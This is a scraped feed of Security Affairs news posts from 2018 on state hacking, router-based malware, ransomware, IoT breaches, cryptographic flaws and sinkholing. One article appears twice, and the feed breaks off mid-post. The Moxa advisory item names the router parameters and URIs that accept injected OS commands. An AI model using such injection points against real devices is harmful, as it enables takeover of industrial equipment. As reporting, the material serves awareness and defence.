In December 2016, the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) published a Joint Analysis Report(JAR) that provided information about the tools, infrastructure and TTPs used by the Russian civilian and military intelligence Services (RIS) against United States election.

U.S. Government linked the cyber activity to a Russian threat actor designated as GRIZZLY STEPPE.  It was the first time that the JAR attributed a malicious cyber activity to specific countries or threat actors.

The JAR reports the activity of two different RIS actors, the APT28 and the APT29, that participated in the cyber attacks on a US political party. The APT29 known as (Cozy Bear, Office Monkeys, CozyCar, The Dukes and CozyDuke) broke into the party’s systems in summer 2015. The APT28 known as (Fancy BearPawn StormSofacy Group, Sednit and STRONTIUM) entered in spring 2016.

Back to the present, the new alert was issued by Britain’s  National Cyber Security Centre, DHS and the US Federal Bureau of Investigation.

Russian hacking espionage

The alert came from the UK National Cyber Security Centre, DHS and the US Federal Bureau of Investigation, the government agencies believe hackers could compromise Western critical infrastructures like power grids and water utilities.

Hackers specifically target routers, switches and firewalls with the intent to compromise the target networks to control traffic and manipulate it for espionage and to deliver malware.

“Targets are primarily government and private-sector organizations, critical infrastructure providers, and the Internet service providers (ISPs) supporting these sectors. This report contains technical details on the tactics, techniques, and procedures (TTPs) used by Russian state-sponsored cyber actors to compromise victims. Victims were identified through a coordinated series of actions between U.S. and international partners.” states the report.

“This report builds on previous DHS reporting and advisories from the United Kingdom, Australia, and the European Union. [1-5] This report contains indicators of compromise (IOCs) and contextual information regarding observed behaviors on the networks of compromised victims.

According to the report, Russian threat actors attempt to exploit flaws in legacy systems or weak protocols and service ports associated with network administration activities. Cyber actors use these weaknesses to

  • identify vulnerable devices;
  • extract device configurations;
  • map internal network architectures;
  • harvest login credentials;
  • masquerade as privileged users;
  • modify
    • device firmware,
    • operating systems,
    • configurations; and
  • copy or redirect victim traffic through Russian cyber-actor-controlled infrastructure.

The experts explained that threat actors behind the Russian hacking campaign do not need to leverage zero-day vulnerabilities or install malware to compromise networking devices. In most cases, Russian hackers exploited the following issues:

  • devices with legacy unencrypted protocols or unauthenticated services,
  • devices insufficiently hardened before installation, and
  • devices no longer supported with security patches by manufacturers or vendors (end-of-life devices).

“FBI has high confidence that Russian state-sponsored cyber actors are using compromised routers to conduct man-in-the-middle attacks to support espionage, extract intellectual property, maintain persistent access to victim networks, and potentially lay a foundation for future offensive operations.” states the alert.

The Government experts warn hackers are specifically targeting devices utilizing Generic Routing Encapsulation (GRE), Cisco Smart Install (SMI), and Simple Network Management Protocol (SNMP).

The main problem is that device administrators often fail to apply a robust configuration, in many cases, they leave default settings and fail to protect theri systems by for example by applying necessary patches.

In this scenario it is quite easy for threat actors to target networking infrastructure.

Pierluigi Paganini

(Security Affairs – Russian hacking, state-sponsored hacking)

The post UK NCSC, DHS and the FBI Warn of Russian hacking campaign on Western networks appeared first on Security Affairs.

Roaming Mantis Malware Campaign Leverages Hacked Routers to Infect Android Users With Banking Trojan

According to experts at Kaspersky, the Roaming Mantis malware is designed for distribution through a simple, but very efficient trick based on DNS hijacking.

According to experts at Kaspersky, the Roaming Mantis malware is designed for distribution through a simple, but very efficient trick based on DNS hijacking.

Imagine a nefarious person swapped out your phone book with one they created, where all of the important phone numbers have been changed to call the bad actors’ friends instead of the bank you were trying to call.

Then imagine whomever answered the phone was able to convince you they actually are the bank you thought you were calling. You answer your security questions over the phone and when you hang up, the bad actor then calls your bank and successfully masquerades as you since they now have answers to your security questions. It is a flawed analogy since none of us use phone books anymore. But if you replace “phone books” with “DNS”, it is not just an analogy — it is a real cyberattack targeting mobile phone users in Asia right now — and it appears to be after users’ banking details.

In March 2018, reports began to surface about hacked routers in Japan redirecting users to compromised websites. Investigation by Kaspersky Lab indicates that the ongoing attack is targeting users in Asia with fake websites customized for English, Korean, Simplified Chinese and Japanese. Infection statistics show that users in Bangladesh, Japan and South Korea are the most impacted.

“Our research revealed that the malware (sic) contains Android application IDs for popular mobile banking and game applications in South Korea. The malware is most prevalent in South Korea, and Korean is the first language targeted in HTML and test.dex. Based on our findings, it appears the malicious app was originally distributed to South Korean targets. Support was then added for Traditional Chinese, English, and Japanese, broadening its target base in the Asian region.”

The attack begins when a user attempts to access a legitimate website through a compromised router. Instead of reaching the intended website, the user is redirected to a convincing copy of the website and will be presented with a popup dialog box which says, “To better experience the browsing, update to the latest Chrome version.” When the user clicks on the OK button, a file called chrome.apk is downloaded, but instead of containing an updated Chrome browser, the file contains the Roaming Mantis malware. During installation of the malware, the user will be prompted to authorize a number of permissions including the ability to appear on top of other applications, access the contact list, collecting account information, sending/receiving SMS messages, making phone calls, recording audio.

Once these permissions have been confirmed by the user, the next stage of the compromise begins.

Using the ability to appear on top of other applications, the malware displays a warning message that says, “Account No. exists risks, use after certification.” When the user presses the Enter button, a fake version of a Google website hosted on a temporary web server on the phone is displayed. The fake pages show the user’s Gmail ID and ask for the user’s Name and Date of Birth. This will provide the bad actors with users’ Google IDs, full names and dates of birth which is enough to start compromising banking information.

Most banks require a second authentication factor (2FA) before allowing a user to make changes, but the malware is authorized to intercept SMS messages which should subvert many 2FA processes.

Mantis Malware

Bad actors implement upgrade processes for malware to ensure they can adapt and improve over time. Roaming Mantis makes use of popular Chinese social media site my.tv.sohu.com for its command & control (C2) needs. Simply making changes to a specific user profile on the social media network can trigger updates on all infected systems. It will be very difficult for technical systems to identify malicious account updates from benign ones.

What is a user to do? It starts with securing the router. Up-to-date firmware, strong passwords for admin access and disabling remote access to the administration interfaces on the router will make it difficult to compromise. This attack targets DNS services running on routers. A DNS service running on a server inside your network is not at risk to this attack (but is not impervious to all attacks.) Only install software from trusted app stores (e.g. Google Play.) Even when installing from a legitimate app store, pay attention to the permissions that are being requested. You are being prompted to approve the permissions so you can make an informed choice. And finally, bad actors are getting much better at language translations. When you see something in your language that doesn’t sound “right” be extra suspicious.

About the author:  Steve Biswanger has over 20 years experience in Information Security consulting, and is a frequent speaker on risk, ICS and IoT topics. He is currently Director of Information Security for Encana, a North American oil & gas company and sits on the Board of Directors for the (ISC)2 Alb

Pierluigi Paganini

(Security Affairs – Mantis malware, hacking)

The post Roaming Mantis Malware Campaign Leverages Hacked Routers to Infect Android Users With Banking Trojan appeared first on Security Affairs.

Massive Ransomware attack cost City of Atlanta $2.7 million

According to Channel 2 Action News that investigated the incident, the ransomware attack on the City of Atlanta cost it at least $2.7 million.

In the last weeks, I wrote about a massive ransomware attack against computer systems in the City of Atlanta.

The ransomware infection has caused the interruption of several city’s online services, including “various internal and customer-facing applications” used to pay bills or access court-related information.

Investigators believe that hackers initially compromised a vulnerable server, then the ransomware began spreading to desktop computers throughout the City network. Crooks demanded a payment of 6 Bitcoin, around $51,000 at the current rate,

New Atlanta Chief Operating Officer Richard Cox said that several departments have been affected.

No critical infrastructure and services seem to be affected, the departments responsible for public safety, water, and airport services are operating as normal, however.

City of Atlanta ransomware

How much cost this attack on the City of Atlanta?

According to Channel 2 Action News that investigated the incident, the ransomware attack cost the city at least $2.7 million.

“They were probably not as protected as we probably thought they were,” Georgia State University cybersecurity researcher Don Hunt said.

Channel 2 investigative reporter Aaron Diamant obtained new records that allowed the media outlet to estimate the overall cost of the attack.

The $2.7 million cost includes eight emergency contracts that were signed just after the malware compromised the city networks.

“They’ve got some really big players on the team there, and they’re spending a lot of money, so the depth of the problems that they had are probably enormous,” Hunt said.

The leaders of the City of Atlanta signed a $650,000 contract with cybersecurity firm SecureWorks that was involved in the incident response.

Accessing the records the journalist discovered that the leaders signed other contracts as reported in the above image, a $600,000 contract with management consultant Ernst and Young for advisory services and another $730,000 to Firsoft.

“That’s absolutely construction work. What they’re looking to do is not revamping the system, they’re starting from scratch and going from the ground up again,” Hunt added.

“You’re talking about the possibility of privacy being violated. It could be an indicator that you’ve got a deeper problem inside or potentially a deeper problem that you want to get ahead of right away,” 

Pierluigi Paganini

(Security Affairs – City of Atlanta, ransomware)

The post Massive Ransomware attack cost City of Atlanta $2.7 million appeared first on Security Affairs.

Talos experts found many high severity flaws in Moxa EDR-810 industrial routers

Security experts at Cisco’s Talos group have discovered a total of 17 vulnerabilities in Moxa EDR-810 industrial routers manufactured by Moxa.

The Moxa EDR-810 is an integrated industrial multiport router that implements firewall, NAT, VPN and managed Layer 2 switch capabilities.

These devices are used in industrial environments to protect systems such as PLC and SCADA systems in factory automation and DCS in oil and gas organizations.

“Today, Talos is disclosing several vulnerabilities that have been identified in Moxa EDR-810 industrial secure router.” reads the security advisory published by Talos.

“Moxa EDR-810 is an industrial secure router with firewall/NAT/VPN and managed Layer 2 switch functions. It is designed for Ethernet-based security applications in remote control or monitoring networks. Moxa EDR-810 provides an electronic security perimeter for the protection of critical assets such as pumping/ treatment systems in water stations, DCS systems in oil and gas applications, and PLC/SCADA systems in factory automation.”

Researchers have discovered many high severity command injection vulnerabilities (CVE-2017-12120, CVE-2017-12121, CVE-2017-12125, CVE-2017-14432 to 14434) affecting the web server functionality.

Some of the issues discovered by Cisco Talos team could allow an attacker to escalate privileges and obtain a root shell on the target Moxa EDR-810 devices by simply sending specially crafted HTTP POST requests.

TALOS-2017-0472 is an exploitable command injection vulnerability that exists in the web server functionality of Moxa EDR-810. A specially crafted HTTP POST can cause a privilege escalation resulting in attacker having access to a root shell.” reads the description for the CVE-2017-12120 flaw.

“An attacker may be able to inject OS commands into the ifs= parm in the “/goform/net_WebPingGetValue” uri to trigger this vulnerability and take control over the targeted device.”

Similar is the CVE-2017-12121 that resides in the web server functionality of Moxa EDR-810.

“A specially crafted HTTP POST can cause a privilege escalation resulting in attacker having access to a root shell. An attacker can inject OS commands into the rsakey\_name= parm in the “/goform/WebRSAKEYGen” uri to trigger this vulnerability and take control over the targeted device.” continues the analysis published by Talos.

Moxa EDR-810

The experts also discovered several high severity DoS vulnerabilities (CVE-2017-14435 to 14437, CVE-2017-12124, CVE-2017-14438 and 14439) that can be exploited by sending specially crafted requests to the device.

TALOS-2017-0476 is an exploitable denial of service vulnerability that exists in the web server functionality of Moxa EDR-810. Access to a specially crafted HTTP URI can cause a null pointer dereference resulting in the web server crashing. An attacker can send a crafted URI to trigger this vulnerability.” reads the description for the CVE-2017-12124.

The experts also reported four medium severity issues related to the storage in plaintext of the passwords, information disclosure affecting the Server Agent functionality, and the use of weakly encrypted or clear text passwords.

Moxa has released an updated version of the firmware to address the above issues.

 

Pierluigi Paganini

(Security Affairs – Moxa EDR-810, hacking)

The post Talos experts found many high severity flaws in Moxa EDR-810 industrial routers appeared first on Security Affairs.

The DMCA and its Chilling Effects on Research

The Center for Democracy and Technology has a good summary of the current state of the DMCA's chilling effects on security research.

To underline the nature of chilling effects on hacking and security research, CDT has worked to describe how tinkerers, hackers, and security researchers of all types both contribute to a baseline level of security in our digital environment and, in turn, are shaped themselves by this environment, most notably when things they do upset others and result in threats, potential lawsuits, and prosecution. We've published two reports (sponsored by the Hewlett Foundation and MacArthur Foundation) about needed reforms to the law and the myriad of ways that security research directly improves people's lives. To get a more complete picture, we wanted to talk to security researchers themselves and gauge the forces that shape their work; essentially, we wanted to "take the pulse" of the security research community.

Today, we are releasing a third report in service of this effort: "Taking the Pulse of Hacking: A Risk Basis for Security Research." We report findings after having interviewed a set of 20 security researchers and hackers -- half academic and half non-academic -- about what considerations they take into account when starting new projects or engaging in new work, as well as to what extent they or their colleagues have faced threats in the past that chilled their work. The results in our report show that a wide variety of constraints shape the work they do, from technical constraints to ethical boundaries to legal concerns, including the DMCA and especially the CFAA.

Note: I am a signatory on the letter supporting unrestricted security research.

Bitcoin web wallet addresses generated with a flawed library are exposed to brute-force attacks

Multiple vulnerabilities in the SecureRandom() function expose Bitcoin web wallet addresses generated by the flawed library to brute-force attacks.

Old Bitcoin web wallet addresses generated in the browser or through JavaScript-based wallet apps might be affected by a cryptographic vulnerability that could be exploited b attackers to steal funds.

According to the experts, the popular  JavaScript SecureRandom() library isn’t securely random, this means that an attacker can launch brute-force attacks on private keys.

The flaw affects the JavaScript SecureRandom() function that is used for generating a random Bitcoin address and its adjacent private key, currently, it doesn’t actually.

“It will generate cryptographic keys that, despite their length, have less than 48 bits of entropy, […] so its output will have no more than 48 bits of entropy even if its seed has more than that,” said the system administrator David Gerard.

“SecureRandom() then runs the number it gets through the obsolete RC4 algorithm, which is known to be more predictable than it should be, i.e. less bits of entropy,” Gerard added. “Thus, your key is more predictable.”

Gerard concluded that all Bitcoin addresses generated using the SecureRandom() function are vulnerable to brute-force attacks.

“The conclusion seems to be that at least all wallets generated by js tools inside browsers since bitcoin exists until 2011 are impacted by the Math.random weakness if applicable to the related implementations, the Math.random or RC4 (Chrome) weakness between 2011 and 2013, and RC4 weakness for Chrome users until end of 2015” continues Gerard.

Gerard explained that several web-based or client-side wallet apps used the SecureRandom() function, the expert said that all Bitcoin addresses possibly affected are:

  • BitAddress pre-2013;
  • bitcoinjs before 2014;
  • current software that uses old repos they found on Github.

A user has thrown the same alert on the Linux Foundation mailing list:

“A significant number of past and current cryptocurrency products contain a JavaScript class named SecureRandom(), containing both entropy collection and a PRNG. The entropy collection and the RNG itself are both deficient to the degree that key material can be recovered by a third party with medium complexity.” reads the alert.

The researcher Mustafa Al-Bassam added that several old implementations for web and client-side Bitcoin wallets apps leveraged the jsbn.js cryptographic library for generating Bitcoin addresses. Unfortunately, the jsbn.js cryptographic library used the SecureRandom() function, this means that Bitcoin address private keys were exposed to attack.

“The original disclosure didn’t contain any information about the library in question, so I did some digging.added Mustafa.

“I think that the vulnerability disclosure is referring to a pre-2013 version of jsbn, a JavaScript crypto library. Before it used the CSRNG in the Web Crypto API, it tried to use nsIDOMCrypto, but incorrectly did a string comparison when checking the browser version.”

If you are using a Bitcoin wallet address generated with tools using the flawed functions you need to generate new Bitcoin address and transfer the funds to the new one.

Pierluigi Paganini

(Security Affairs – Bitcoin wallet, cyber security)

The post Bitcoin web wallet addresses generated with a flawed library are exposed to brute-force attacks appeared first on Security Affairs.

Attackers exfiltrated a casino’s high-roller list through a connected fish tank

Nicole Eagan, the CEO of cybersecurity company Darktrace, revealed that is company investigated that hack of an unnamed casino that was breached via a thermometer in a lobby fish tank.

Internet of things devices are enlarging our attack surface, smart devices are increasingly targeted by hackers in the wild.

The case we are going to discuss demonstrate it, Nicole Eagan, the CEO of cybersecurity company Darktrace, revealed that is company investigated that hack of an unnamed casino that was breached via a thermometer in a lobby aquarium.

“There’s a lot of internet of things devices, everything from thermostats, refrigeration systems, HVAC [air conditioning] systems, to people who bring in their Alexa devices into the offices. There’s just a lot of IoT. It expands the attack surface and most of this isn’t covered by traditional defenses.” Nicole Eagan, the CEO of cybersecurity company Darktrace, told the WSJ CEO Council in London on Thursday.

“The attackers used that to get a foothold in the network. They then found the high-roller database and then pulled that back across the network, out the thermostat, and up to the cloud,” 

The hackers stole the casino’s high-roller database through a thermometer in the lobby fish tank.

fish tank

This isn’t the first a thermometer hack reported by experts at Darktrace, in July 2017 hackers attempted to exfiltrate data from a US casino by hacking into an Internet-connected fish tank.

A connected fish tank included sensors used to control the temperature, food distribution, and cleanliness of the tank.

“Somebody got into the fish tank and used it to move around into other areas (of the network) and sent out data,” said Justin Fier, Darktrace’s director of cyber intelligence. 

At the time, hackers exfiltrated 10 GB of data that were sent out to a device in Finland.

Pierluigi Paganini

(Security Affairs – fish tank, hacking)

The post Attackers exfiltrated a casino’s high-roller list through a connected fish tank appeared first on Security Affairs.

Microsoft engineer charged with money laundering linked to Reveton ransomware

The Microsoft network engineer Raymond Uadiale (41)  is facing federal charges in Florida for the alleged involvement in Reveton Ransomware case.

The man is suspected to have had a role in helping launder money obtained from victims of the Reventon ransomware.

Uadiale currently works at Microsoft site in Seattle since 2014, according to Florida police between October 2012 and March 2013 he operated online with a UK citizen that used the moniker K!NG.

K!NG was responsible for Reveton ransomware distribution meanwhile Uadiale is accused to have managed the victims’ payments and shared them with K!NG.

“The judge did a double take when he heard that Uadiale has been working for Microsoft in the Seattle area since 2014.” reported the SunSentinel.

Cybersecurity, don’t tell me?” U.S. Magistrate Judge Barry Seltzer quipped. “Are they aware of the charges?”

Assistant U.S. Attorney Jared Strauss confirmed in court that Uadiale involvement in Reveton campaign occurred before he was hired by Microsoft and prosecutors don’t have any evidence that he had any involvement in actually spreading the malware.

“Reveton is described as drive-by malware because unlike many viruses—which activate when users open a file or attachment—this one can install itself when users simply click on a compromised website. Once infected, the victim’s computer immediately locks, and the monitor displays a screen stating there has been a violation of federal law.” reads an alert published by the FBI in 2012.

Reveton ransomware

The Reveton ransomware locks the screen on the infected devices and requests victims to buy GreenDot MoneyPak vouchers and insert their code into the Reveton screen locker to unlock them.

The locked screen would display a fake message purportedly from the FBI or other law enforcement agency would claim the user had violated federal law.

While K!NG was accumulating victims’ payments on GreenDot MoneyPak prepaid cards, Uadiale was transferring them to the man in the UK via the Liberty Reserve virtual currency. The Liberty Reserve was shut down in 2013 and its founder Arthur Budovsky was sentenced to 20 years in jail for committing money laundering.

Court documents confirmed that Uadiale transferred more than $130,000 to K!NG.

Uadiale, is currently free on $100,000 bond and must wear an electronic monitor, he risks a maximum sentence of up to 20 years in prison, a fine of up to $500,000, and up to three years of supervised release.

Pierluigi Paganini

(Security Affairs – Reventon ransomware, cybercrime)

The post Microsoft engineer charged with money laundering linked to Reveton ransomware appeared first on Security Affairs.

UK GCHQ director confirmed major cyberattack on Islamic State

GCHQ director Jeremy Fleming announced this week that the U.K. has launched a major cyberattack on the Islamic State (IS) terrorist organization.

According to the spy chief, the GCHQ the attack was launched in collaboration with the U.K. Ministry of Defence and has distributed operations of the Islamic State.

The UK intelligence believes this is the first time it “systematically and persistently degraded an adversary’s online efforts as part of a wider military campaign,”

Fleming explained that UK cyber experts have operated to disrupt online activities and networks of the Islamic State, and deter an individual or group.

“These operations have made a significant contribution to coalition efforts to suppress Daesh propaganda, hindered their ability to coordinate attacks, and protected coalition forces on the battlefield,” GCHQ chief told an audience at the Cyber UK conference in Manchester.

“In 2017 there were times when Daesh found it almost impossible to spread their hate online, to use their normal channels to spread their rhetoric, or trust their publications. Of course, the job is never done – they will continue to evade and reinvent. But this campaign shows how targeted and effective offensive cyber can be,” 

Mr. Fleming did not reveal details of the cyber attacks because it was “too sensitive to talk about,” he praised the success of such kind of operations against a threat that is abusing technology to spread propaganda.

“Much of this is too sensitive to talk about, but I can tell you that GCHQ, in partnership with the Ministry of Defence, has conducted a major offensive cyber campaign against Daesh.” added Mr. Fleming.

“These operations have made a significant contribution to coalition efforts to suppress Daesh propaganda, hindered their ability to coordinate attacks, and protected coalition forces on the battlefield. But cyber is only one part of the wider international response. This is the first time the UK has systematically and persistently degraded an adversary’s online efforts as part of a wider military campaign.”

The US CYBERCOM and Europol have also been conducting cyber operations against online activities of the Islamic State.

Mr. Fleming has also spoken about Russia defining its cyber activity as an “unacceptable cyber-behaviour” that was a “growing threat” to the West.

“We’ll continue to expose Russia’s unacceptable cyber behaviour, so they’re held accountable for what they do, and to help Government and industry protect themselves. The UK will continue to respond to malicious cyber activity in conjunction with international partners such as the United States. We will attribute where we can.” added Flaming.
“And whilst we face an emboldened Russia, we also see the tectonic plates in the Middle East moving. We see Iran and its proxies meddling throughout the region. The use of Chemical Weapons in Syria. We’re watching the dispersal of Daesh fighters. Serious Crime Gangs smuggling people from Eastern Europe and Northern Africa.”

Flaming also cited the NotPetya ransomware attack on Ukraine that both UK and US attributed to Russia.

“They’re not playing to the same rules,” Mr Fleming concluded. “They’re blurring the boundaries between criminal and state activity.”

Pierluigi Paganini

(Security Affairs – Islamic State, terrorism)

The post UK GCHQ director confirmed major cyberattack on Islamic State appeared first on Security Affairs.

Security Affairs newsletter Round 158 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web” is online

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      ATMJackpot, a new strain of ATM Malware discovered by experts
·      Auth0 authentication bypass issue exposed enterprises to hack
·      Experts spotted a campaign spreading a new Agent Tesla Spyware variant
·      Crooks distribute malware masquerade as fake software updates and use NetSupport RAT
·      Sodexo Filmology data breach – Users need cancel their credit cards
·      Verge Cryptocurrency suffered a cyber attack, dev team responded with an Hard Fork
·      Vigilante hackers strike Russia and Iran Networks exploiting Cisco CVE-2018-0171 flaw
·      Booby-trapped Office docs build with ThreadKit trigger CVE-2018-4878 flaw
·      Linux open source utility Beep is affected by several vulnerabilitues
·      Public services at the Caribbean island Sint Maarten shut down by a cyber attack
·      SirenJack flaw in Emergency Alert Systems could be exploited to trigger false alarms
·      Top VEVO Music videos Including ‘Despacito defaced by hackers
·      Adobe April Security Bulletin Tuesday fixed 4 critical flaws in Flash
·      AMD and Microsoft release microcode and operating system updates against Spectre flaw
·      Microsoft April Patch Tuesday – Update your system now to avoid being hacked by visiting a site
·      APT33 devised a code injection technique dubbed Early Bird to evade detection by anti-malware tools
·      CVE-2018-0950 flaw in Microsoft Outlook could be exploited to steal Windows Passwords
·      Researchers discovered several flaws that expose electrical substations to hack
·      SAP April 2018 Security Patch Day address critical flaws in web browser controls in SAP Business Client
·      $3.3 Million stolen from main Coinsecure Bitcoin wallet
·      Experts uncovered a proxy botnet composed of over 65,000 routers exposed via UPnP protocol
·      Experts warn threat actors are scanning the web for Drupal installs vulnerable to Drupalgeddon2
·      Uber agrees to new FTC settlement over 2016 data breach
·      When the Russian Malware coder Gatsoev is praised by the Russian head of Information Department of the Ministry of Education and Science of North Ossetia
·      Are your Android devices updated? Researchers say maybe no
·      Great Western Railway asks users to reset passwords due to a security breach
·      Malware researcher have dismantled the EITest Network composed of 52,000

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 158 – News of the week appeared first on Security Affairs.

Security Affairs: Malware researcher have dismantled the EITest Network composed of 52,000

Malware researchers from Abuse.ch, BrillantIT, and Proofpoint have sinkholed the control infrastructure behind EITest campaign and shut down it.

Malware researchers from Abuse.ch, BrillantIT, and Proofpoint have sinkholed the control infrastructure behind EITest campaign that leveraged on a network of hacked servers exploited by crooks to distribute traffic (TDS).

The network was used to redirect users to compromised domains hosting exploit kits, delivering malware or used for other fraudulent activities such as tech scams.

EITest infrastructure was first discovered back in 2011, from middle 2014 crooks started using it as a TDS botnet.

“researchers traced the chain via server side artifacts and some historical analysis of server side compromises to infections as early as 2011 when it was redirecting to a private EK known as Glazunov.wrote Proofpoint researcher Kafeine.

“The infection chain appears to have paused between the end of 2013 and the beginning of July 2014, when it began directing into Angler

Hackers installed a backdoor on the compromised machines and used it to redirect legitimate traffic to malicious websites, for this reason, experts defined EITest as the “king of traffic distribution.”

“EITest is one of the longest malicious delivery campaigns that has continued to evolve. In the spring of 2017, it started redirecting Internet Explorer users to tech support scams in addition to the existing redirections with the fake Chrome fonts.” reads the analysis published “Malware don’t need coffee.” website.

“Actors behind this campaign are generating hundreds of domains per day.The only purpose of those domains names is to redirect users to tech support scams or malicious websites.”

According to researcher Kafeine, crooks behind the EITest campaign started selling hijacked traffic from hacked sites for $20 per 1,000 users, selling traffic blocks of 50-70,000 visitors, generating between $1,000 and $1,400 per block of traffic.

“in the past month the activity behind this infection chain has primarily consisted of social engineering [1] and tech support scams [3] leading to ransomware.” added Kafeine.

Early 2018, a malware a researcher at BrillantIT was able to sinkhole the botnet after discovered how to crack the way the bots contact the C&C servers.

EITest campaign shut down

The experts were able to hijack the entire EITest network by seizing just one domain (stat-dns.com)  Traffic analysis allowed the researchers to discover that the botnet handled about two million users per day coming from over 52,000 compromised websites, most of which were WordPress sites.

Kafeine added that following the successful sinkhole operation, the operators behind the botnet have shut down their C&C proxies. Kafeine added the experts noticed some encoded calls to the sinkhole that embedded commands they would associate with takeover attempts. At the time it is not clear who sent them, likely the operators or other researchers attempting to interact control infrastructure.

“Following the successful sinkhole operation, the actor shut down their C&C proxies, but we have not observed further overt reactions by the operators of EITest,” concluded Kafeine.

“However, we will continue to monitor EITest activity as the  EITest actor may attempt to regain control of a portion of the compromised websites involved in the infection chain.”

Pierluigi Paganini

(Security Affairs – EITest network, hacking)

The post Malware researcher have dismantled the EITest Network composed of 52,000 appeared first on Security Affairs.



Security Affairs

Malware researcher have dismantled the EITest Network composed of 52,000

Malware researchers from Abuse.ch, BrillantIT, and Proofpoint have sinkholed the control infrastructure behind EITest campaign and shut down it.

Malware researchers from Abuse.ch, BrillantIT, and Proofpoint have sinkholed the control infrastructure behind EITest campaign that leveraged on a network of hacked servers exploited by crooks to distribute traffic (TDS).

The network was used to redirect users to compromised domains hosting exploit kits, delivering malware or used for other fraudulent activities such as tech scams.

EITest infrastructure was first discovered back in 2011, from middle 2014 crooks started using it as a TDS botnet.

“researchers traced the chain via server side artifacts and some historical analysis of server side compromises to infections as early as 2011 when it was redirecting to a private EK known as Glazunov.wrote Proofpoint researcher Kafeine.

“The infection chain appears to have paused between the end of 2013 and the beginning of July 2014, when it began directing into Angler

Hackers installed a backdoor on the compromised machines and used it to redirect legitimate traffic to malicious websites, for this reason, experts defined EITest as the “king of traffic distribution.”

“EITest is one of the longest malicious delivery campaigns that has continued to evolve. In the spring of 2017, it started redirecting Internet Explorer users to tech support scams in addition to the existing redirections with the fake Chrome fonts.” reads the analysis published “Malware don’t need coffee.” website.

“Actors behind this campaign are generating hundreds of domains per day.The only purpose of those domains names is to redirect users to tech support scams or malicious websites.”

According to researcher Kafeine, crooks behind the EITest campaign started selling hijacked traffic from hacked sites for $20 per 1,000 users, selling traffic blocks of 50-70,000 visitors, generating between $1,000 and $1,400 per block of traffic.

“in the past month the activity behind this infection chain has primarily consisted of social engineering [1] and tech support scams [3] leading to ransomware.” added Kafeine.

Early 2018, a malware a researcher at BrillantIT was able to sinkhole the botnet after discovered how to crack the way the bots contact the C&C servers.

EITest campaign shut down

The experts were able to hijack the entire EITest network by seizing just one domain (stat-dns.com)  Traffic analysis allowed the researchers to discover that the botnet handled about two million users per day coming from over 52,000 compromised websites, most of which were WordPress sites.

Kafeine added that following the successful sinkhole operation, the operators behind the botnet have shut down their C&C proxies. Kafeine added the experts noticed some encoded calls to the sinkhole that embedded commands they would associate with takeover attempts. At the time it is not clear who sent them, likely the operators or other researchers attempting to interact control infrastructure.

“Following the successful sinkhole operation, the actor shut down their C&C proxies, but we have not observed further overt reactions by the operators of EITest,” concluded Kafeine.

“However, we will continue to monitor EITest activity as the  EITest actor may attempt to regain control of a portion of the compromised websites involved in the infection chain.”

Pierluigi Paganini

(Security Affairs – EITest network, hacking)

The post Malware researcher have dismantled the EITest Network composed of 52,000 appeared first on Security Affairs.

Are your Android devices updated? Researchers say maybe no

Probably you don’t know that many Android smartphone vendors fail to roll out Google’s security patches and updates exposing the users to severe risks.

Researchers at Security Research Labs (SRL) that the problem also involves major vendors, including HTC, Huawei, and Motorola.

In some cases, manufacturers roll out incomplete security patches leaving the devices vulnerable to cyber attacks.

“Phones now receive monthly security updates. Installing patches every month is an important first step, but is still insufficient unless all relevant patches are included in those updates. Our large study of Android phones finds that most Android vendors regularly forget to include some patches, leaving parts of the ecosystem exposed to the underlying risks.” reads the blog post published by the SRL team. 

The popular SRL experts Karsten Nohl and Jakob Lell presented the findings of the research at the Hack In The Box security conference in Amsterdam, the Netherlands.

The experts pointed out that that, even if Google is able to install some security patched over-the-air without vendor interaction, in some cases the fixes affect low-level faulty software components, such as drivers and system libraries, and this process needs the involvement of manufacturers.

The experts explained that some Android devices receive only half of the monthly updates, in some cases only from Google and none from the manufacturer.

The following table shows the average number of missing Critical and High severity patches before the claimed patch date (Samples – Few: 5-9; Many: 10-49; Lots: 50)
Experts clarified that some phones are included multiple times with different firmware releases.

android devices patches

Researchers at SRL explained that the only way to discover what is installed on your device is to take a look at what is included in the monthly fixes from Google verify that most important updates are present on the device.

The good news for users is that the failure in patch management is some cases is not enough for an attacker to remotely compromise an Android device and bypass defense mechanisms like Android’s sandbox and ASLR.

“Modern operating systems include several security barriers, for example, ASLR and sandboxing, all of which typically need to be breached to remotely hack a phone.” continues the researchers.

“Owing to this complexity, a few missing patches are usually not enough for a hacker to remotely compromise an Android device. Instead, multiple bugs need to be chained together for a successful hack.”

I suggest you read the research paper for more details.

Pierluigi Paganini

(Security Affairs – Android devices, security patches)

The post Are your Android devices updated? Researchers say maybe no appeared first on Security Affairs.

Great Western Railway asks users to reset passwords due to a security breach

The British train company Great Western Rail announced it has suffered a security breach that affected at least 1,000 accounts out of more than a million.

The company owned by the FirstGroup transport business runs trains between London, Penzance, and Worcester

Great Western Rail is urging affected customers to change the password used to access the GWR.com portal, it also informed the UK Information Commissioner’s Office.

Attackers used credential stuffing to access the accounts, this means that hackers attempted to access the accounts by using credentials leaked from other data breaches.

The company is now extending the incident response measure to other account holders.

“We have identified unauthorised automated attempts to access a small number of GWR.com accounts over the past week,” a spokesman told the BBC.

“While we were able to shut this activity down quickly and contact those affected, a small proportion of accounts were successfully accessed.”

“The success rate of the automated logins was extremely low, suggesting any passwords used were likely harvested elsewhere,”

In the following image is reported a data breach notification received by a customer.

GWR notification

The messages inform users that Great Western Rail has reset all GWR.com passwords as a precaution.

“To ensure the security of your personal information you will need to do this when you next log in to the GWR.com website.” reads the message.

“You should use a unique password for each of your accounts for security, and we recommend you review all of your accounts for maximum security, and we recommend you review all your online passwords and change any that are the same.”

 

If you are a Great Western Rail user change your password and change the password for each website where you used the same credentials.

As usual, let me suggest using a strong password and enable two-factor authentication when available.

Pierluigi Paganini

(Security Affairs – Great Western Rail, hacking)

The post Great Western Railway asks users to reset passwords due to a security breach appeared first on Security Affairs.

Experts warn threat actors are scanning the web for Drupal installs vulnerable to Drupalgeddon2

After the publication of a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes,” experts started observing bad actors attempting to exploit the flaw.

